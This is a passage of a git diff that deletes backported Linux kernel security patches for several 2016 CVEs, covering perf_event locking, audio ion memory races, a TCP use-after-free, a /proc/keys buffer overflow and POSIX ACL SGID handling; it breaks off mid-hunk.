-+}
- EXPORT_SYMBOL_GPL(perf_event_enable);
-
--int perf_event_refresh(struct perf_event *event, int refresh)
-+static int _perf_event_refresh(struct perf_event *event, int refresh)
- {
- /*
- * not supported on inherited events
-@@ -2237,10 +2333,25 @@ int perf_event_refresh(struct perf_event *event, int refresh)
- return -EINVAL;
-
- atomic_add(refresh, &event->event_limit);
-- perf_event_enable(event);
-+ _perf_event_enable(event);
-
- return 0;
- }
-+
-+/*
-+ * See perf_event_disable()
-+ */
-+int perf_event_refresh(struct perf_event *event, int refresh)
-+{
-+ struct perf_event_context *ctx;
-+ int ret;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ ret = _perf_event_refresh(event, refresh);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
-+}
- EXPORT_SYMBOL_GPL(perf_event_refresh);
-
- static void ctx_sched_out(struct perf_event_context *ctx,
-@@ -3433,7 +3544,16 @@ static void perf_remove_from_owner(struct perf_event *event)
- rcu_read_unlock();
-
- if (owner) {
-- mutex_lock(&owner->perf_event_mutex);
-+ /*
-+ * If we're here through perf_event_exit_task() we're already
-+ * holding ctx->mutex which would be an inversion wrt. the
-+ * normal lock order.
-+ *
-+ * However we can safely take this lock because its the child
-+ * ctx->mutex.
-+ */
-+ mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
-+
- /*
- * We have to re-check the event->owner field, if it is cleared
- * we raced with perf_event_exit_task(), acquiring the mutex
-@@ -3559,12 +3679,13 @@ static int perf_event_read_group(struct perf_event *event,
- u64 read_format, char __user *buf)
- {
- struct perf_event *leader = event->group_leader, *sub;
-- int n = 0, size = 0, ret = -EFAULT;
- struct perf_event_context *ctx = leader->ctx;
-- u64 values[5];
-+ int n = 0, size = 0, ret;
- u64 count, enabled, running;
-+ u64 values[5];
-+
-+ lockdep_assert_held(&ctx->mutex);
-
-- mutex_lock(&ctx->mutex);
- count = perf_event_read_value(leader, &enabled, &running);
-
- values[n++] = 1 + leader->nr_siblings;
-@@ -3579,7 +3700,7 @@ static int perf_event_read_group(struct perf_event *event,
- size = n * sizeof(u64);
-
- if (copy_to_user(buf, values, size))
-- goto unlock;
-+ return -EFAULT;
-
- ret = size;
-
-@@ -3593,14 +3714,11 @@ static int perf_event_read_group(struct perf_event *event,
- size = n * sizeof(u64);
-
- if (copy_to_user(buf + ret, values, size)) {
-- ret = -EFAULT;
-- goto unlock;
-+ return -EFAULT;
- }
-
- ret += size;
- }
--unlock:
-- mutex_unlock(&ctx->mutex);
-
- return ret;
- }
-@@ -3672,8 +3790,14 @@ static ssize_t
- perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
- {
- struct perf_event *event = file->private_data;
-+ struct perf_event_context *ctx;
-+ int ret;
-
-- return perf_read_hw(event, buf, count);
-+ ctx = perf_event_ctx_lock(event);
-+ ret = perf_read_hw(event, buf, count);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
- }
-
- static unsigned int perf_poll(struct file *file, poll_table *wait)
-@@ -3699,7 +3823,7 @@ static unsigned int perf_poll(struct file *file, poll_table *wait)
- return events;
- }
-
--static void perf_event_reset(struct perf_event *event)
-+static void _perf_event_reset(struct perf_event *event)
- {
- (void)perf_event_read(event);
- local64_set(&event->count, 0);
-@@ -3718,6 +3842,7 @@ static void perf_event_for_each_child(struct perf_event *event,
- struct perf_event *child;
-
- WARN_ON_ONCE(event->ctx->parent_ctx);
-+
- mutex_lock(&event->child_mutex);
- func(event);
- list_for_each_entry(child, &event->child_list, child_list)
-@@ -3731,14 +3856,13 @@ static void perf_event_for_each(struct perf_event *event,
- struct perf_event_context *ctx = event->ctx;
- struct perf_event *sibling;
-
-- WARN_ON_ONCE(ctx->parent_ctx);
-- mutex_lock(&ctx->mutex);
-+ lockdep_assert_held(&ctx->mutex);
-+
- event = event->group_leader;
-
- perf_event_for_each_child(event, func);
- list_for_each_entry(sibling, &event->sibling_list, group_entry)
- perf_event_for_each_child(sibling, func);
-- mutex_unlock(&ctx->mutex);
- }
-
- static int perf_event_period(struct perf_event *event, u64 __user *arg)
-@@ -3808,25 +3932,24 @@ static int perf_event_set_output(struct perf_event *event,
- struct perf_event *output_event);
- static int perf_event_set_filter(struct perf_event *event, void __user *arg);
-
--static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
- {
-- struct perf_event *event = file->private_data;
- void (*func)(struct perf_event *);
- u32 flags = arg;
-
- switch (cmd) {
- case PERF_EVENT_IOC_ENABLE:
-- func = perf_event_enable;
-+ func = _perf_event_enable;
- break;
- case PERF_EVENT_IOC_DISABLE:
-- func = perf_event_disable;
-+ func = _perf_event_disable;
- break;
- case PERF_EVENT_IOC_RESET:
-- func = perf_event_reset;
-+ func = _perf_event_reset;
- break;
-
- case PERF_EVENT_IOC_REFRESH:
-- return perf_event_refresh(event, arg);
-+ return _perf_event_refresh(event, arg);
-
- case PERF_EVENT_IOC_PERIOD:
- return perf_event_period(event, (u64 __user *)arg);
-@@ -3873,6 +3996,19 @@ static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- return 0;
- }
-
-+static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+ struct perf_event *event = file->private_data;
-+ struct perf_event_context *ctx;
-+ long ret;
-+
-+ ctx = perf_event_ctx_lock(event);
-+ ret = _perf_ioctl(event, cmd, arg);
-+ perf_event_ctx_unlock(event, ctx);
-+
-+ return ret;
-+}
-+
- #ifdef CONFIG_COMPAT
- static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- unsigned long arg)
-@@ -3895,11 +4031,15 @@ static long perf_compat_ioctl(struct file *file, unsigned int cmd,
-
- int perf_event_task_enable(void)
- {
-+ struct perf_event_context *ctx;
- struct perf_event *event;
-
- mutex_lock(¤t->perf_event_mutex);
-- list_for_each_entry(event, ¤t->perf_event_list, owner_entry)
-- perf_event_for_each_child(event, perf_event_enable);
-+ list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
-+ ctx = perf_event_ctx_lock(event);
-+ perf_event_for_each_child(event, _perf_event_enable);
-+ perf_event_ctx_unlock(event, ctx);
-+ }
- mutex_unlock(¤t->perf_event_mutex);
-
- return 0;
-@@ -3907,11 +4047,15 @@ int perf_event_task_enable(void)
-
- int perf_event_task_disable(void)
- {
-+ struct perf_event_context *ctx;
- struct perf_event *event;
-
- mutex_lock(¤t->perf_event_mutex);
-- list_for_each_entry(event, ¤t->perf_event_list, owner_entry)
-- perf_event_for_each_child(event, perf_event_disable);
-+ list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
-+ ctx = perf_event_ctx_lock(event);
-+ perf_event_for_each_child(event, _perf_event_disable);
-+ perf_event_ctx_unlock(event, ctx);
-+ }
- mutex_unlock(¤t->perf_event_mutex);
-
- return 0;
-@@ -7269,6 +7413,15 @@ out:
- return ret;
- }
-
-+static void mutex_lock_double(struct mutex *a, struct mutex *b)
-+{
-+ if (b < a)
-+ swap(a, b);
-+
-+ mutex_lock(a);
-+ mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
-+}
-+
- /**
- * sys_perf_event_open - open a performance event, associate it to a task/cpu
- *
-@@ -7284,7 +7437,7 @@ SYSCALL_DEFINE5(perf_event_open,
- struct perf_event *group_leader = NULL, *output_event = NULL;
- struct perf_event *event, *sibling;
- struct perf_event_attr attr;
-- struct perf_event_context *ctx;
-+ struct perf_event_context *ctx, *uninitialized_var(gctx);
- struct file *event_file = NULL;
- struct fd group = {NULL, 0};
- struct task_struct *task = NULL;
-@@ -7482,9 +7635,14 @@ SYSCALL_DEFINE5(perf_event_open,
- }
-
- if (move_group) {
-- struct perf_event_context *gctx = group_leader->ctx;
-+ gctx = group_leader->ctx;
-+
-+ /*
-+ * See perf_event_ctx_lock() for comments on the details
-+ * of swizzling perf_event::ctx.
-+ */
-+ mutex_lock_double(&gctx->mutex, &ctx->mutex);
-
-- mutex_lock(&gctx->mutex);
- perf_remove_from_context(group_leader, false);
-
- /*
-@@ -7499,15 +7657,19 @@ SYSCALL_DEFINE5(perf_event_open,
- perf_event__state_init(sibling);
- put_ctx(gctx);
- }
-- mutex_unlock(&gctx->mutex);
-- put_ctx(gctx);
-+ } else {
-+ mutex_lock(&ctx->mutex);
- }
-
- WARN_ON_ONCE(ctx->parent_ctx);
-- mutex_lock(&ctx->mutex);
-
- if (move_group) {
-+ /*
-+ * Wait for everybody to stop referencing the events through
-+ * the old lists, before installing it on new lists.
-+ */
- synchronize_rcu();
-+
- perf_install_in_context(ctx, group_leader, group_leader->cpu);
- get_ctx(ctx);
- list_for_each_entry(sibling, &group_leader->sibling_list,
-@@ -7519,6 +7681,11 @@ SYSCALL_DEFINE5(perf_event_open,
-
- perf_install_in_context(ctx, event, event->cpu);
- perf_unpin_context(ctx);
-+
-+ if (move_group) {
-+ mutex_unlock(&gctx->mutex);
-+ put_ctx(gctx);
-+ }
- mutex_unlock(&ctx->mutex);
-
- put_online_cpus();
-@@ -7626,7 +7793,11 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
- dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
-
-- mutex_lock(&src_ctx->mutex);
-+ /*
-+ * See perf_event_ctx_lock() for comments on the details
-+ * of swizzling perf_event::ctx.
-+ */
-+ mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
- list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
- event_entry) {
- perf_remove_from_context(event, false);
-@@ -7634,11 +7805,9 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- put_ctx(src_ctx);
- list_add(&event->migrate_entry, &events);
- }
-- mutex_unlock(&src_ctx->mutex);
-
- synchronize_rcu();
-
-- mutex_lock(&dst_ctx->mutex);
- list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
- list_del(&event->migrate_entry);
- if (event->state >= PERF_EVENT_STATE_OFF)
-@@ -7648,6 +7817,7 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- get_ctx(dst_ctx);
- }
- mutex_unlock(&dst_ctx->mutex);
-+ mutex_unlock(&src_ctx->mutex);
- }
- EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- struct q6audio_aio *audio = file->private_data;
- pr_debug("%s[%p]\n", __func__, audio);
- mutex_lock(&audio->lock);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- audio->wflush = 1;
- if (audio->enabled)
- audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- audio_aio_reset_event_queue(audio);
- q6asm_audio_client_free(audio->ac);
- mutex_unlock(&audio->lock);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- mutex_destroy(&audio->lock);
- mutex_destroy(&audio->read_lock);
- mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- mutex_lock(&audio->lock);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
- * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file) - struct q6audio_aio *audio = file->private_data; - pr_debug("%s[%p]\n", __func__, audio); - mutex_lock(&audio->lock); -+ mutex_lock(&audio->read_lock); -+ mutex_lock(&audio->write_lock); - audio->wflush = 1; - if (audio->enabled) - audio_aio_flush(audio); -@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file) - wake_up(&audio->event_wait); - audio_aio_reset_event_queue(audio); - q6asm_audio_client_free(audio->ac); -+ mutex_unlock(&audio->write_lock); -+ mutex_unlock(&audio->read_lock); - mutex_unlock(&audio->lock); - mutex_destroy(&audio->lock); - mutex_destroy(&audio->read_lock); -@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd, - __func__); - rc = -EFAULT; - } else { -+ mutex_lock(&audio->read_lock); -+ mutex_lock(&audio->write_lock); - rc = audio_aio_ion_add(audio, &info); -+ mutex_unlock(&audio->write_lock); -+ mutex_unlock(&audio->read_lock); - } - mutex_unlock(&audio->lock); - break; -@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd, - __func__); - rc = -EFAULT; - } else { -+ mutex_lock(&audio->read_lock); -+ mutex_lock(&audio->write_lock); - rc = audio_aio_ion_remove(audio, &info); -+ mutex_unlock(&audio->write_lock); -+ mutex_unlock(&audio->read_lock); - } - mutex_unlock(&audio->lock); - break; -@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd, - } else { - info.fd = info_32.fd; - info.vaddr = compat_ptr(info_32.vaddr); -+ mutex_lock(&audio->read_lock); -+ mutex_lock(&audio->write_lock); - rc = audio_aio_ion_add(audio, &info); -+ mutex_unlock(&audio->write_lock); -+ mutex_unlock(&audio->read_lock); - } - mutex_unlock(&audio->lock); - break; -@@ -2013,7 +2029,11 @@ static long 
audio_aio_compat_ioctl(struct file *file, unsigned int cmd, - } else { - info.fd = info_32.fd; - info.vaddr = compat_ptr(info_32.vaddr); -+ mutex_lock(&audio->read_lock); -+ mutex_lock(&audio->write_lock); - rc = audio_aio_ion_remove(audio, &info); -+ mutex_unlock(&audio->write_lock); -+ mutex_unlock(&audio->read_lock); - } - mutex_unlock(&audio->lock); - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch deleted file mode 100644 index e2ec7d0b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch +++ /dev/null 
@@ -1,57 +0,0 @@
-From bb1fceca22492109be12640d49f5ea5a544c6bb4 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Wed, 17 Aug 2016 05:56:26 -0700
-Subject: tcp: fix use after free in tcp_xmit_retransmit_queue()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
-tail of the write queue using tcp_add_write_queue_tail()
-
-Then it attempts to copy user data into this fresh skb.
-
-If the copy fails, we undo the work and remove the fresh skb.
-
-Unfortunately, this undo lacks the change done to tp->highest_sack and
-we can leave a dangling pointer (to a freed skb)
-
-Later, tcp_xmit_retransmit_queue() can dereference this pointer and
-access freed memory. For regular kernels where memory is not unmapped,
-this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
-returning garbage instead of tp->snd_nxt, but with various debug
-features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
-
-This bug was found by Marco Grassi thanks to syzkaller.
-
-Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
-Reported-by: Marco Grassi
-Signed-off-by: Eric Dumazet
-Cc: Ilpo Järvinen
-Cc: Yuchung Cheng
-Cc: Neal Cardwell
-Acked-by: Neal Cardwell
-Reviewed-by: Cong Wang
-Signed-off-by: David S. Miller
----
- include/net/tcp.h | 2 ++
- 1 file changed, 2 insertions(+)
-
-(limited to 'include/net/tcp.h')
-
-diff --git a/include/net/tcp.h b/include/net/tcp.h
-index c00e7d5..7717302 100644
---- a/include/net/tcp.h
-+++ b/include/net/tcp.h
-@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
- {
- if (sk->sk_send_head == skb_unlinked)
- sk->sk_send_head = NULL;
-+ if (tcp_sk(sk)->highest_sack == skb_unlinked)
-+ tcp_sk(sk)->highest_sack = NULL;
- }
-
- static inline void tcp_init_send_head(struct sock *sk)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch
deleted file mode 100644
index 7c96fe4f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@ -From 03dab869b7b239c4e013ec82aea22e181e441cfc Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Wed, 26 Oct 2016 15:01:54 +0100 -Subject: KEYS: Fix short sprintf buffer in /proc/keys show function - -This fixes CVE-2016-7042. - -Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector -is turned on, this can cause a panic due to stack corruption. - -The problem is that xbuf[] is not big enough to hold a 64-bit timeout -rendered as weeks: - - (gdb) p 0xffffffffffffffffULL/(60*60*24*7) - $2 = 30500568904943 - -That's 14 chars plus NUL, not 11 chars plus NUL. - -Expand the buffer to 16 chars. - -I think the unpatched code apparently works if the stack-protector is not -enabled because on a 32-bit machine the buffer won't be overflowed and on a -64-bit machine there's a 64-bit aligned pointer at one side and an int that -isn't checked again on the other side. - -The panic incurred looks something like: - -Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe -CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1 -Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011 - 0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f - ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6 - ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679 -Call Trace: - [] dump_stack+0x63/0x84 - [] panic+0xde/0x22a - [] ? proc_keys_show+0x3ce/0x3d0 - [] __stack_chk_fail+0x19/0x30 - [] proc_keys_show+0x3ce/0x3d0 - [] ? key_validate+0x50/0x50 - [] ? key_default_cmp+0x20/0x20 - [] seq_read+0x2cc/0x390 - [] proc_reg_read+0x42/0x70 - [] __vfs_read+0x37/0x150 - [] ? 
security_file_permission+0xa0/0xc0 - [] vfs_read+0x96/0x130 - [] SyS_read+0x55/0xc0 - [] entry_SYSCALL_64_fastpath+0x1a/0xa4 - -Reported-by: Ondrej Kozina -Signed-off-by: David Howells -Tested-by: Ondrej Kozina -cc: stable@vger.kernel.org -Signed-off-by: James Morris ---- - security/keys/proc.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/security/keys/proc.c b/security/keys/proc.c -index f0611a6..b9f531c 100644 ---- a/security/keys/proc.c -+++ b/security/keys/proc.c -@@ -181,7 +181,7 @@ static int proc_keys_show(struct seq_file *m, void *v) - struct timespec now; - unsigned long timo; - key_ref_t key_ref, skey_ref; -- char xbuf[12]; -+ char xbuf[16]; - int rc; - - struct keyring_search_context ctx = { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch deleted file mode 100644 index 8beb5150..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch +++ /dev/null 
@@ -1,425 +0,0 @@ -From 6b0c893dc08060d6999b07136391d8a298678dae Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 19 Sep 2016 17:39:09 +0200 -Subject: [PATCH] BACKPORT: posix_acl: Clear SGID bit when setting file - permissions - -(cherry pick from commit 073931017b49d9458aa351605b43a7e34598caef) - -When file permissions are modified via chmod(2) and the user is not in -the owning group or capable of CAP_FSETID, the setgid bit is cleared in -inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file -permissions as well as the new ACL, but doesn't clear the setgid bit in -a similar way; this allows to bypass the check in chmod(2). Fix that. - -NB: conflicts resolution included extending the change to all visible - users of the near deprecated function posix_acl_equiv_mode - replaced with posix_acl_update_mode. We did not resolve the ACL - leak in this CL, require additional upstream fixes. - -References: CVE-2016-7097 -Reviewed-by: Christoph Hellwig -Reviewed-by: Jeff Layton -Signed-off-by: Jan Kara -Signed-off-by: Andreas Gruenbacher -Bug: 32458736 -Change-Id: I19591ad452cc825ac282b3cfd2daaa72aa9a1ac1 ---- - fs/9p/acl.c | 40 +++++++++++++++++----------------------- - fs/btrfs/acl.c | 6 ++---- - fs/ext2/acl.c | 12 ++++-------- - fs/ext3/acl.c | 12 ++++-------- - fs/ext4/acl.c | 12 ++++-------- - fs/f2fs/acl.c | 6 ++---- - fs/generic_acl.c | 8 ++------ - fs/gfs2/acl.c | 11 +++-------- - fs/jffs2/acl.c | 9 ++++----- - fs/jfs/xattr.c | 6 +++--- - fs/ocfs2/acl.c | 18 ++++++------------ - fs/posix_acl.c | 31 +++++++++++++++++++++++++++++++ - fs/reiserfs/xattr_acl.c | 8 ++------ - fs/xfs/xfs_acl.c | 13 +++---------- - include/linux/posix_acl.h | 1 + - 15 files changed, 88 insertions(+), 105 deletions(-) - -diff --git a/fs/9p/acl.c b/fs/9p/acl.c -index 7af425f53beef..9686c1f17653f 100644 ---- a/fs/9p/acl.c -+++ b/fs/9p/acl.c -@@ -320,32 +320,26 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name, - case ACL_TYPE_ACCESS: - name = 
POSIX_ACL_XATTR_ACCESS; - if (acl) { -- umode_t mode = inode->i_mode; -- retval = posix_acl_equiv_mode(acl, &mode); -- if (retval < 0) -+ struct iattr iattr; -+ -+ retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl); -+ if (retval) - goto err_out; -- else { -- struct iattr iattr; -- if (retval == 0) { -- /* -- * ACL can be represented -- * by the mode bits. So don't -- * update ACL. -- */ -- acl = NULL; -- value = NULL; -- size = 0; -- } -- /* Updte the mode bits */ -- iattr.ia_mode = ((mode & S_IALLUGO) | -- (inode->i_mode & ~S_IALLUGO)); -- iattr.ia_valid = ATTR_MODE; -- /* FIXME should we update ctime ? -- * What is the following setxattr update the -- * mode ? -+ if (!acl) { -+ /* -+ * ACL can be represented -+ * by the mode bits. So don't -+ * update ACL. - */ -- v9fs_vfs_setattr_dotl(dentry, &iattr); -+ value = NULL; -+ size = 0; - } -+ iattr.ia_valid = ATTR_MODE; -+ /* FIXME should we update ctime ? -+ * What is the following setxattr update the -+ * mode ? -+ */ -+ v9fs_vfs_setattr_dotl(dentry, &iattr); - } - break; - case ACL_TYPE_DEFAULT: -diff --git a/fs/btrfs/acl.c b/fs/btrfs/acl.c -index 0890c83643e94..d6d53e5e7945d 100644 ---- a/fs/btrfs/acl.c -+++ b/fs/btrfs/acl.c -@@ -118,11 +118,9 @@ static int btrfs_set_acl(struct btrfs_trans_handle *trans, - case ACL_TYPE_ACCESS: - name = POSIX_ACL_XATTR_ACCESS; - if (acl) { -- ret = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (ret < 0) -+ ret = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (ret) - return ret; -- if (ret == 0) -- acl = NULL; - } - ret = 0; - break; -diff --git a/fs/ext2/acl.c b/fs/ext2/acl.c -index 110b6b371a4ed..48c3c2d7d2619 100644 ---- a/fs/ext2/acl.c -+++ b/fs/ext2/acl.c -@@ -206,15 +206,11 @@ ext2_set_acl(struct inode *inode, int type, struct posix_acl *acl) - case ACL_TYPE_ACCESS: - name_index = EXT2_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, 
&inode->i_mode, &acl); -+ if (error) - return error; -- else { -- inode->i_ctime = CURRENT_TIME_SEC; -- mark_inode_dirty(inode); -- if (error == 0) -- acl = NULL; -- } -+ inode->i_ctime = CURRENT_TIME_SEC; -+ mark_inode_dirty(inode); - } - break; - -diff --git a/fs/ext3/acl.c b/fs/ext3/acl.c -index dbb5ad59a7fc3..bb2f60a62d82a 100644 ---- a/fs/ext3/acl.c -+++ b/fs/ext3/acl.c -@@ -205,15 +205,11 @@ ext3_set_acl(handle_t *handle, struct inode *inode, int type, - case ACL_TYPE_ACCESS: - name_index = EXT3_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- inode->i_ctime = CURRENT_TIME_SEC; -- ext3_mark_inode_dirty(handle, inode); -- if (error == 0) -- acl = NULL; -- } -+ inode->i_ctime = CURRENT_TIME_SEC; -+ ext3_mark_inode_dirty(handle, inode); - } - break; - -diff --git a/fs/ext4/acl.c b/fs/ext4/acl.c -index d40c8dbbb0d66..87d9bbf6a53f3 100644 ---- a/fs/ext4/acl.c -+++ b/fs/ext4/acl.c -@@ -201,15 +201,11 @@ __ext4_set_acl(handle_t *handle, struct inode *inode, int type, - case ACL_TYPE_ACCESS: - name_index = EXT4_XATTR_INDEX_POSIX_ACL_ACCESS; - if (acl) { -- error = posix_acl_equiv_mode(acl, &inode->i_mode); -- if (error < 0) -+ error = posix_acl_update_mode(inode, &inode->i_mode, &acl); -+ if (error) - return error; -- else { -- inode->i_ctime = ext4_current_time(inode); -- ext4_mark_inode_dirty(handle, inode); -- if (error == 0) -- acl = NULL; -- } -+ inode->i_ctime = ext4_current_time(inode); -+ ext4_mark_inode_dirty(handle, inode); - } - break; - -diff --git a/fs/f2fs/acl.c b/fs/f2fs/acl.c -index 44abc2f286e00..9c4f3c732bce4 100644 ---- a/fs/f2fs/acl.c -+++ b/fs/f2fs/acl.c -@@ -223,12 +223,10 @@ static int f2fs_set_acl(struct inode *inode, int type, struct posix_acl *acl) - case 